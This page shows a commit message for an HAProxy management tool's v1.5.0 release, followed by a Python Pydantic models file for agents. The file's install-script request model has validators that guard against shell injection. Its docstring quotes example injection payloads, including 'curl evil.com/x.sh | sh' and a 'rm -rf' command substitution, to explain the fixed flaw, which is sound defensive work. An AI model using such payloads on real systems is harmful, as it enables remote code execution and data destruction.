Files
T
taylanbakircioglu 02b1cb2bca feat: v1.5.0 — Site Wizard (Issue #14) + ACME Diagnostic Panel (Issue #13)
Closes #13, Closes #14.

This release squashes the v1.4.0 → v1.5.0 development line. v1.4.0
shipped the ACME stability & enterprise audit (Issues #10/#11/#12).
v1.5.0 builds on that foundation with two co-equal headline features
plus a 22-round audit campaign hardening the prior configuration
surface. License remains MIT for v1.5.0 (relicense to AGPL-3.0
lands in v1.5.2).

------------------------------------------------------------------
HEADLINE FEATURE A — ACME Diagnostic Panel (Issue #13)
------------------------------------------------------------------
A live pre-flight + post-failure diagnostic surface for every ACME
order, reachable from the ACME Automation page. The panel exists
to make ACME failures legible to operators who do NOT have shell
access to the API host.

Endpoints (`backend/routers/acme_diagnostics.py`):
  POST /api/letsencrypt/orders/{order_id}/diagnostics
       Run the full 5-check suite (DNS / port-80 / routing /
       account / agents) and humanize the order's `error_detail`
       (>=11 RFC-8555 problem types, backwards compatible with
       legacy plain-string failures).
  POST /api/letsencrypt/orders/{order_id}/diagnostics/
                                {check_id}/rerun
       Re-run a single check in place — used by the "Re-run"
       button on every row of the modal's pre-flight table.
  GET  /api/letsencrypt/orders/{order_id}/events
       Merged event timeline combining the typed
       `acme_order_events` rows with correlated
       `user_activity_logs` entries (resource_type =
       'letsencrypt_order' AND resource_id = order_id). The
       diagnostic modal auto-tails this timeline every 5 seconds
       while open.

Service-level checks (`backend/services/acme_diagnostics.py`):
  * DNS resolution via stdlib socket.gethostbyname_ex through
    run_in_executor (intentionally avoiding an aiodns runtime
    dep for v1.5.0).
  * Port-80 HEAD probe, target locked to the order's domains,
    success on HTTP 200 OR 404, warns on egress timeout
    (corp egress policies routinely blackhole outbound 80 —
    fail-hard would be too noisy).
  * SSRF guard: probe refuses non-public IPs and surfaces the
    skip in the diagnostic result; IPv4-mapped IPv6 normalisation
    closes the `::ffff:169.254.169.254` cloud-metadata vector.
  * HAProxy routing presence check: matches the order's
    cluster_ids to a port-80 HTTP frontend.
  * ACME account validity check against `letsencrypt_accounts`.
  * Agent presence check (>=1 active agent in target cluster).
  * Every sub-check wrapped in a wall-clock timeout to bound
    impact on the API event loop.

RBAC: ssl.read for run, ssl.read for events. Per-user 5/min rate
limit on both run and rerun, backed by the (user_id, action,
created_at DESC) composite index.

Frontend (`frontend/src/components/ACMEAutomation.js`):
  * "Diagnose" button on every order row + the existing
    "stuck order" warning row.
  * Modal with two tabs:
    - Pre-flight Checks (Antd Table with status pills + Re-run
      buttons + humanized error banner)
    - Event Log (Antd Timeline with auto-tail polling, scroll-
      to-bottom, pause-on-hover)
  * Correlation IDs surfaced in error banners and individual
    check fail details for backend-log lookup.

------------------------------------------------------------------
HEADLINE FEATURE B — Site Setup Wizard (Issue #14)
------------------------------------------------------------------
A single guided flow that creates a Backend + Servers + HTTP
Frontend (and optional HTTPS Frontend) in one atomic transaction.

Endpoints (`backend/routers/site_wizard.py`):
  POST /api/site-wizard/preview     — diff-preview the changeset
  POST /api/site-wizard/create      — atomic execute
  POST /api/site-wizard/reject      — clean rollback (including
                                       any wizard_staged ACME
                                       orders)
  GET  /api/site-wizard/drafts      — draft persistence
  PUT  /api/site-wizard/drafts/{id} — save/update
  DELETE /api/site-wizard/drafts/{id}

Feature surface:
  * One screen captures both backend (mode + servers) AND
    frontend (http + optional https + SSL mode) inputs.
  * SSL modes: ACME (new order, HTTP-01 only for v1.5.0),
    Upload (existing PEM), Existing (link to a stored cert),
    or None.
  * ACME-staged path: wizard_staged_until watermark on the
    `letsencrypt_orders` row defers finalisation until agent
    confirmation; per-mode reject cleanly cancels and rolls
    back the staged order.
  * Live diff preview against the cluster's current generated
    config (renderer-evolution noise stripped — track-sc<N>
    dedup, per-server cookie strip, defaults-cookie
    inheritance, listen-block flattening).
  * Draft persistence with PEM stripped at save time (private
    keys never round-trip through the drafts table).
  * Per-cluster multi-tenancy: drafts and wizard_staged orders
    are isolated to the creating user's cluster scope.

Frontend (`frontend/src/components/SiteWizard.js`):
  * 4-step Antd Steps flow: Backend → Frontend → SSL → Review.
  * Render the live diff preview inline before commit.
  * Antd Form-level validation mirrors backend Pydantic
    validators (numeric bounds, HAProxy reserved keywords, ALPN
    consistency, IPv6 scope-id, domain regex, server name
    dedup).

------------------------------------------------------------------
AUDIT CAMPAIGN — Rounds 1 → 22 (Bulgu #1#82)
------------------------------------------------------------------
v1.5.0 includes 22 adversarial review passes. Each round produced
its own commit set in the corporate development line; this squash
collapses those into the v1.5.0 release artefact. Highlights:

  Round 1-4   Site Wizard core: dry-run parity, single-line
              value injection guard, ACL -f pattern-file block,
              SSL parity, timeout regex, form-state pin.
  Round 5-7   defaults-cookie inheritance, server-named-cookie
              guard, fe/be mode mismatch, duplicate server
              names, health_check_uri + server_address
              validators.
  Round 8-10  cookie_name / cookie_options newline-injection
              guard, dry-run parity (round 9), TCP-mode HTTP-only
              feature blockers.
  Round 11    SSL name path traversal + health-check >= 1.
  Round 12-13 SSL & ACME deep dive (Bulgu #23-#32).
  Round 14    single-line value injection (Bulgu #33).
  Round 15-17 ACME multi-tenant UX, numeric bounds, HAProxy
              reserved keywords, ALPN/TLS consistency,
              all-backup, multi-domain & multi-user enterprise
              edges, drain/HSTS/post-completion (Bulgu
              #34-#53).
  Round 18-21 concurrency, agent state, TCP-mode HTTP-only,
              list size caps, IPv6 scope-id, preview account
              validation, TCP backend + balance uri reject
              (Bulgu #54-#61).
  Round 22    FE error visibility + 3x stale-data lockouts,
              referential integrity + cascade safety,
              authentication & authorization, multi-cluster
              isolation, apply_pending_changes concurrency,
              script injection + bulk import multi-tenancy,
              prefix-stripped signature comparison
              (Bulgu #62-#82).

------------------------------------------------------------------
NO CORPORATE-SPECIFIC ARTIFACTS
------------------------------------------------------------------
This squash deliberately sanitises corporate hostnames, container
registry references, and TLS secret names into generic
placeholders (`your-registry.example.com/your-org`,
`haproxy-openmanager*.example.com`, `wildcard-tls`,
`taylanbakircioglu/haproxy-openmanager-*`) so the public artefact
contains no internal infrastructure detail. Pilot / development
history that retained those values stays in the corporate fork
and is NOT part of this commit.
2026-05-14 00:04:19 +03:00

214 lines
8.2 KiB
Python

import re
from pydantic import BaseModel, validator
from typing import Optional, List, Dict, Any
class AgentCreate(BaseModel):
name: str
pool_id: int
platform: str = "linux"
architecture: str = "amd64"
version: str = "1.0.0"
class AgentRegister(BaseModel):
name: str
pool_id: int
platform: str = "linux"
architecture: str = "amd64"
version: str = "1.0.0"
hostname: Optional[str] = None
ip_address: Optional[str] = None
operating_system: Optional[str] = None
kernel_version: Optional[str] = None
uptime: Optional[int] = None
cpu_count: Optional[int] = None
memory_total: Optional[int] = None # in MB
disk_space: Optional[int] = None # in MB
network_interfaces: Optional[List[str]] = None
capabilities: Optional[List[str]] = None
class AgentHeartbeat(BaseModel):
name: str
status: str = "online"
# Optional system info from agent
hostname: Optional[str] = None
platform: Optional[str] = None
architecture: Optional[str] = None
version: Optional[str] = None # Agent version
cluster_id: Optional[int] = None
# Detailed system information (flat format - for backward compatibility with old agents)
operating_system: Optional[str] = None
kernel_version: Optional[str] = None
uptime: Optional[int] = None # in seconds
cpu_count: Optional[int] = None
memory_total: Optional[int] = None # in bytes
disk_space: Optional[int] = None # in bytes
network_interfaces: Optional[List[str]] = None
capabilities: Optional[List[str]] = None
ip_address: Optional[str] = None
# Optional performance metrics
cpu_usage: Optional[float] = None
memory_usage: Optional[float] = None
disk_usage: Optional[float] = None
load_average: Optional[List[float]] = None
network_io: Optional[Dict[str, Any]] = None
# HAProxy info
haproxy_status: Optional[str] = None
haproxy_version: Optional[str] = None
# Keepalive (VRRP) state
keepalive_state: Optional[str] = None # "MASTER", "BACKUP", or None
keepalive_ip: Optional[str] = None # Virtual IP managed by keepalived
# Server status from HAProxy stats socket
server_statuses: Optional[Dict[str, Dict[str, str]]] = None # {backend_name: {server_name: status}}
# Full HAProxy stats CSV (base64 encoded) for dashboard metrics
haproxy_stats_csv: Optional[str] = None
# Config sync tracking (agent reports what it successfully applied)
applied_config_version: Optional[str] = None
# System info collected by agent (JSON object - nested format for new agents)
system_info: Optional[Dict[str, Any]] = None
# Other optional fields
last_config_update: Optional[str] = None
errors: Optional[List[str]] = None
class Config:
# Allow extra fields from agents (for forward compatibility and tolerance)
extra = "allow"
class AgentToggle(BaseModel):
enabled: bool
class AgentPoolCreate(BaseModel):
name: str
description: Optional[str] = None
environment: str = "development" # development, staging, production
location: Optional[str] = None
default_config: Optional[Dict[str, Any]] = None
is_active: Optional[bool] = True
class AgentPoolUpdate(BaseModel):
name: Optional[str] = None
description: Optional[str] = None
environment: Optional[str] = None
location: Optional[str] = None
default_config: Optional[Dict[str, Any]] = None
is_active: Optional[bool] = None
# Aliases for pool management
PoolCreate = AgentPoolCreate
PoolUpdate = AgentPoolUpdate
class AgentScriptRequest(BaseModel):
"""Request body for agent install / upgrade script generation.
Bulgu #81 (round-22 audit) — pre-fix this model had ZERO
validators. Every field was a free-form `str`, and the
generator at `routers/agent.py::generate_install_script`
interpolates the values directly into a shell-script
template via `script_template.replace("{{KEY}}", value)`.
An operator with `agents.create` permission could therefore
supply payloads like:
haproxy_bin_path = "/usr/sbin/haproxy; curl evil.com/x.sh | sh #"
agent_name = "$(rm -rf /var/log/haproxy-agent)"
hostname_prefix = "`reboot`"
The generated `install-agent.sh` would then carry the
payload verbatim. Anyone running the script (typically as
root via `sudo ./install-agent.sh`) would execute the
injected commands. Because the script is downloaded as a
file and frequently shared between teammates, the audit
trail loses the connection between the operator who
generated it and the host that eventually ran it.
The validators below mirror the existing field-validation
conventions in `models/frontend.py` / `models/backend.py`:
* `platform`, `architecture`: tightly enumerated.
* `agent_name`, `hostname_prefix`: alphanumerics + the
dash / underscore / dot set that hostnames legally use.
* The three `*_path` fields: absolute POSIX paths
without shell metacharacters or path-traversal segments.
HAProxy's own files always live under operator-controlled
paths; the regex is generous enough for any real OS-package
install location while strict enough that the result is
safe to inline into a shell script.
"""
platform: str
architecture: str
pool_id: int
cluster_id: int
agent_name: str
hostname_prefix: str
haproxy_bin_path: str
haproxy_config_path: str
stats_socket_path: str
@validator('platform', 'architecture')
def _validate_platform_token(cls, v):
if not isinstance(v, str) or not v.strip():
raise ValueError('platform/architecture must be a non-empty string')
s = v.strip()
if len(s) > 64:
raise ValueError('platform/architecture too long (max 64 chars)')
if not re.match(r'^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$', s):
raise ValueError(
'platform/architecture must contain only letters, '
'digits, and `._-`'
)
return s
@validator('agent_name', 'hostname_prefix')
def _validate_hostname_token(cls, v):
if not isinstance(v, str) or not v.strip():
raise ValueError('agent_name/hostname_prefix must be a non-empty string')
s = v.strip()
if len(s) > 64:
raise ValueError('agent_name/hostname_prefix too long (max 64 chars)')
# RFC 1123 hostname-label-ish: letters, digits, dash,
# underscore, dot. NO shell metacharacters, no spaces,
# no `$` `` ` `` `;` `&` `|` `<` `>` `\` `"` `'` `(` `)` etc.
if not re.match(r'^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$', s):
raise ValueError(
'agent_name/hostname_prefix must start with an '
'alphanumeric and contain only letters, digits, dots, '
'dashes or underscores'
)
return s
@validator('haproxy_bin_path', 'haproxy_config_path', 'stats_socket_path')
def _validate_safe_posix_path(cls, v):
if not isinstance(v, str) or not v.strip():
raise ValueError('path must be a non-empty string')
s = v.strip()
if len(s) > 4096:
raise ValueError('path too long (max 4096 chars)')
if not s.startswith('/'):
raise ValueError('path must be an absolute POSIX path starting with `/`')
# Reject ANY shell-metacharacter that could break out of
# the surrounding shell context in the generated script,
# plus newline / NULL / backslash / glob wildcards. Path-
# traversal sequences are not strictly dangerous (the
# agent file system owner decides what's accessible) but
# `..` segments are rejected anyway to keep the audit log
# readable.
FORBIDDEN = set('$`;&|<>"\'\\\n\r\x00*?')
if any(c in FORBIDDEN for c in s):
raise ValueError(
'path contains a forbidden character — shell '
'metacharacters and whitespace are not allowed '
'to keep the generated install script safe to execute'
)
if '/../' in s or s.endswith('/..') or s.startswith('../'):
raise ValueError('path must not contain `..` segments')
return s
class AgentUpgradeRequest(BaseModel):
agent_id: int